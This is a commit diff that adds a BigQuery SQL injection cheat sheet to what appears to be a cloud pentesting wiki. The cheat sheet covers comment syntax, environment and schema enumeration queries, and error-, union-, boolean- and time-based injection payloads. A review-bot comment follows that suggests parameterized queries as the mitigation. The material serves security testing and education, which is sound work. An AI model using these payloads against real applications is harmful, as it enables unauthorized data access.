GITBOOK-587: change request with no subject merged in GitBook
carlospolop authored and gitbook-bot committed Feb 28, 2024
1 parent 668f61a commit 7f7bb18
Showing 1 changed file with 55 additions and 1 deletion.
56 changes: 55 additions & 1 deletion pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md
Expand Up @@ -170,7 +170,61 @@ bq show --encryption_service_account # Get encryption service account

### BigQuery SQL Injection

[https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac)
For further information you can check the blog post: [https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac). Here just some details are going to be given.

**Comments**:

* `select 1#from here it is not working`
* `select 1/*between those it is not working*/` But just the initial one won't work
* `select 1--from here it is not working`

Get **information** about the **environment** such as:

* Current user: `select session_user()`
* Project id: `select @@project_id`

Get **datasets**, **tables** and **column** names:

* **Project** and **dataset** name:

{% code overflow="wrap" %}
```sql
SELECT catalog_name, schema_name FROM INFORMATION_SCHEMA.SCHEMATA
```
{% endcode %}

* **Column** and **table** names: 

{% code overflow="wrap" %}
```sql
# SELECT table_name, column_name FROM <proj-name>.<dataset-name>.INFORMATION_SCHEMA.COLUMNS

SELECT table_name, column_name FROM digital-bonfire-410512.importeddataset.INFORMATION_SCHEMA.COLUMNS
```
{% endcode %}

* **Other datasets** in the same project:&#x20;

{% code overflow="wrap" %}
```sql
# SELECT catalog_name, schema_name, FROM <proj-name>.INFORMATION_SCHEMA.SCHEMATA

SELECT catalog_name, schema_name, NULL FROM digital-bonfire-410512.INFORMATION_SCHEMA.SCHEMATA
```
{% endcode %}

**SQL Injection types:**

* Error based - casting: `select CAST(@@project_id AS INT64)`
* Error based - division by zero: `' OR if(1/(length((select('a')))-1)=1,true,false) OR '`
* Union based: `UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#`
* Boolean based: ``' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#``
* Potential time based - Usage of public datasets example: ``SELECT * FROM `bigquery-public-data.covid19_open_data.covid19_open_data` LIMIT 1000``

**Documentation:**

* All function list: [https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators)
* Scripting statements: [https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting](https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting)

### Privilege Escalation & Post Exploitation

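Review bot: In the "Other datasets" bullet the commented template (`SELECT catalog_name, schema_name, FROM <proj-name>.INFORMATION_SCHEMA.SCHEMATA`) and the concrete query below it (`SELECT catalog_name, schema_name, NULL FROM ...`) do not match: the template has a dangling trailing comma where the live query pads the column list with `NULL`, so a reader copying the template gets a different column count than the example that follows; make both lines select the same columns (and quote `digital-bonfire-410512` in backticks for consistency with the boolean- and time-based examples, which backtick their fully qualified names). The same bullet label ends in a literal `&#x20;` entity rather than a space, and the "Column and table names" label carries trailing whitespace. The new intro sentence, "Here just some details are going to be given", reads awkwardly; "Only a few details are given here" says the same thing. Finally, the section lists injection techniques but nothing about the defensive side for readers who own the affected code: one line noting that BigQuery supports parameterized queries (`@name` placeholders in the SQL, `--parameter` on `bq query`) as the mitigation for every variant listed would make the reference complete.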
